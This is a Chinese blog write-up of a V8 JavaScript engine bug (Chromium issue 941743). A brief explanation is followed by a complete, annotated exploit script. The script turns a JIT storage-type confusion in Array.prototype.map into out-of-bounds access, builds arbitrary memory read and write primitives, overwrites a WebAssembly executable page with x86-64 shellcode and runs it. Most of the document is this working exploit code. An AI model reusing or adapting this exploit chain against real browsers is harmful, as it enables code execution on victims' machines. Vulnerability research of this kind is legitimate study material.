
Issue 941743

作者: cnitlrt | 来源:发表于2022-01-24 15:46 被阅读0次
    # Pin the V8 revision the writeup targets (hash as given on the page), fetch its
    # dependencies, then build the x64 release configuration.
    git checkout d7cd9051ad9b53f72c32cd27493470b0801eb545
    gclient sync -f
    ./tools/dev/gm.py x64.release
    
    思路

    和 CVE-2018-17463 类似：当数组的 size 大于 0x2000000 时，它就会从 FixedArray 变为 NamedDictionary，但优化之后 JIT 依然把该数组当作 FixedArray 类型。因为 FixedArray 是连续存储的，按 NamedDictionary 的方式访问的话肯定会访问到不同偏移的地方，这样就构造出了类似数组越界的原语。之后按常规思路创建一个 length 很大的数组，找到 rwx_addr 写入 shellcode，然后运行即可。

    exp
    // Shared 8-byte scratch buffer used by the int/float reinterpretation helpers below.
    var buf = new ArrayBuffer(8);
    var dv = new DataView(buf, 0, 8);
    
    
    // Reinterpret a 64-bit integer (Number or BigInt) as the double with the same bit pattern.
    function i2f(value) {
        var littleEndian = true;
        var bits = BigInt(value);
        dv.setBigUint64(0, bits, littleEndian);
        return dv.getFloat64(0, littleEndian);
    }
    
    // Reinterpret a double as the unsigned 64-bit BigInt with the same bit pattern.
    function f2i(value) {
        var littleEndian = true;
        dv.setFloat64(0, value, littleEndian);
        var bits = dv.getBigUint64(0, littleEndian);
        return bits;
    }
    // Reinterpret a 32-bit unsigned integer as the single-precision float with the same bits.
    function i2f32(value) {
        var littleEndian = true;
        dv.setUint32(0, value, littleEndian);
        var asFloat = dv.getFloat32(0, littleEndian);
        return asFloat;
    }
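    // Reinterpret a single-precision float as the unsigned 32-bit integer with the same bits.
    // Returns a Number (32-bit values fit exactly), unlike f2i which returns a BigInt.
    function f2i32(value) {
        dv.setFloat32(0, value, true);
        // DataView has no getBigUint32; the original call always threw a TypeError.
        return dv.getUint32(0, true);
    }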
    
    // Format a Number or BigInt as a 0x-prefixed lowercase hex string.
    function hex(addr){
        var digits = addr.toString(16);
        return `0x${digits}`;
    }
    // Instantiates a tiny WebAssembly module from the inline bytes and returns its exported
    // `hello` function. The bytes name an import env.puts and exports "memory" and "hello".
    // The instance is presumably here only so the engine allocates executable code memory
    // for it; later code derives rwx_addr relative to this instance's address.
    function wasm_func() {
        var wasmImports = {
            env: {
                // NOTE(review): utf8ToString is not defined anywhere on this page and `print`
                // is a d8 shell global, so this import would throw if the module ever called it.
                // `h` is declared below; it is only read when puts runs, after the instance exists.
                puts: function puts (index) {
                    print(utf8ToString(h, index));
                }
            }
        };
        // Raw .wasm bytes (magic "\0asm", version 1).
        var buffer = new Uint8Array([0,97,115,109,1,0,0,0,1,137,128,128,128,0,2,
            96,1,127,1,127,96,0,0,2,140,128,128,128,0,1,3,101,110,118,4,112,117,
            116,115,0,0,3,130,128,128,128,0,1,1,4,132,128,128,128,0,1,112,0,0,5,
            131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,
            109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,1,10,141,128,128,
            128,0,1,135,128,128,128,0,0,65,16,16,0,26,11,11,146,128,128,128,0,1,0,
            65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
        let m = new WebAssembly.Instance(new WebAssembly.Module(buffer),wasmImports);
        let h = new Uint8Array(m.exports.memory.buffer);   // byte view over the module's linear memory
        return m.exports.hello;
    }
    
    // NOTE(review): `func` is an implicit global (no var/let); this works in a sloppy-mode
    // d8 script but fails under strict mode or as an ES module.
    func = wasm_func();
    var wasmObjAddr;
    // a2, floatArray, tmp_low, tmp_high, addr_high and addr_low are declared but never used below.
    var a1, a2,a3,a4,floatArray,obj,objArray,objBuf,objView,tmp_low,tmp_high,addr_high,addr_low;
    // Large throw-away allocation; its purpose is not stated on the page — presumably heap shaping, confirm.
    Array(2**30);
    // Holey array whose length is grown past 0x2000000 below to trigger the storage transition.
    var a = [1,2,,3];
    // Maps `arr` through a callback that allocates a fresh 3-element double array into the
    // global `a1` on index 0 and, on every later index, checks that a1.length still reads 3.
    // If it does not, the index is printed and the string "e" is thrown. The loop below runs
    // this many times so the JIT optimises it; afterwards the same call serves as the
    // detector for the corrupted a1.length once `a` has changed representation.
    function mapping(arr) {
       return arr.map((content,idx)=>{
        if(idx == 0){
            a1 = [1.1,2.2,3.3];
        }else if(a1.length != 3){
            print(idx);
            throw "e";   // string thrown on purpose; only its occurrence matters to the caller
        }
        return content;
       });
    }
    // Warm-up: run mapping() many times so the JIT optimises it with `a` observed as a
    // plain array.
    for(let i = 0; i < 0x10000; i ++) mapping(a);
    // Grow `a` to the size the writeup names (0x2000000) so it is re-stored in dictionary
    // mode, fill it from index 0x18 onward, then grow it a little more.
    a.length = 0x2000000;
    a.fill(0x1234,0x18);
    a.length += 0x100;
    // Re-run the optimised code. Per the writeup it still indexes `a` as a FixedArray, so the
    // callback's a1.length check fails and mapping() throws; the catch prints the corrupted length.
    try{
        mapping(a);
    }catch(e){
        print(hex(a1.length));
        // (a commented-out read_dataview stub used to sit here; the real one is defined below)
    }
    // Alias of the array whose length was corrupted above; all out-of-bounds reads and
    // writes below go through it.
    a3 = a1;
    // DataView whose backing-store pointer read_dataview/write_dataview redirect.
    objBuf = new ArrayBuffer(0x200);
    objView = new DataView(objBuf);
    // Distinctive 64-bit patterns; presumably markers to recognise when dumping a3 below
    // (a4 is never read on this page).
    a4 = new BigUint64Array(4);
    a4[0] = 0x1122334455667788n;
    a4[1] = 0xaabbaabbccddccddn;
    a4[2] = 0xdeadbeefdeadbeefn;
    a4[3] = 0xeeeeeeeeffffffffn;
    obj = {aaaa:"bbbb"};
    objArray = [obj];
    objArray[0] = func;   // the wasm `hello` function now sits in objArray's element store
    // Dump the first 100 doubles reachable through a3 as raw 64-bit hex; only possible
    // because a1.length no longer reflects its 3 real elements.
    for(let i = 0;i<100;i++) print(i + ":" + hex(f2i(a3[i])));
    // Index 84 is taken to hold objArray[0]'s pointer; the -1 presumably strips a tag bit.
    // The offset is specific to this build/heap layout — confirm against the dump above.
    wasmObjAddr = f2i(a3[84]) - 0x1n;
    console.log("wasm object addr: "+hex(wasmObjAddr));
    // Stores the given 64-bit pattern into objArray[0] (as a double) and reads it back
    // through the out-of-bounds view at a3[84], minus 1 (same slot/offset as wasmObjAddr).
    // NOTE(review): despite its name this does not take an object; it is never called on
    // this page.
    function addrof(addr){
        objArray[0] = i2f(addr);
        return f2i(a3[84]) - 0x1n;
    }
    // Arbitrary read: writes `addr` into slot 35 of the out-of-bounds view (the BigInt index
    // is coerced to the property key "35") — presumably where objView's backing-store pointer
    // lives, confirm — then reads 8 bytes through objView and returns them as a BigInt.
    function read_dataview(addr){
        a3[35n] = i2f(addr);
        return f2i(objView.getFloat64(0,true));
    }
    // Arbitrary write: redirects objView the same way read_dataview does, then copies
    // `payload` (an array of byte values) one byte at a time starting at offset 0.
    // The third argument to setUint8 is ignored (endianness is meaningless for one byte).
    function write_dataview(addr,payload){
        a3[35n] = i2f(addr);
        for(var i = 0;i < payload.length;i++){
            objView.setUint8(i,payload[i],true);
        }
    }
    // Read the 8 bytes at a fixed offset (-0xf8) from the wasm instance object; the writeup
    // takes this to be the address of the instance's executable code region. The offset is
    // specific to the pinned build — confirm.
    var rwx_addr = read_dataview(wasmObjAddr-0xf8n);
    console.log("rwx_addr: "+hex(rwx_addr));
    // Raw x86-64 machine-code bytes; the page does not document what they do.
    var shellcode = [72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 121, 98,
        96, 109, 98, 1, 1, 72, 49, 4, 36, 72, 184, 47, 117, 115, 114, 47, 98,
        105, 110, 80, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1,
        72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90,
        72, 1, 226, 82, 72, 137, 226, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72,
        184, 121, 98, 96, 109, 98, 1, 1, 1, 72, 49, 4, 36, 49, 246, 86, 106, 8,
        94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5];
    // Overwrite the wasm function's code with the bytes above, then call the export so the
    // overwritten code runs.
    write_dataview(rwx_addr, shellcode);
    func();
    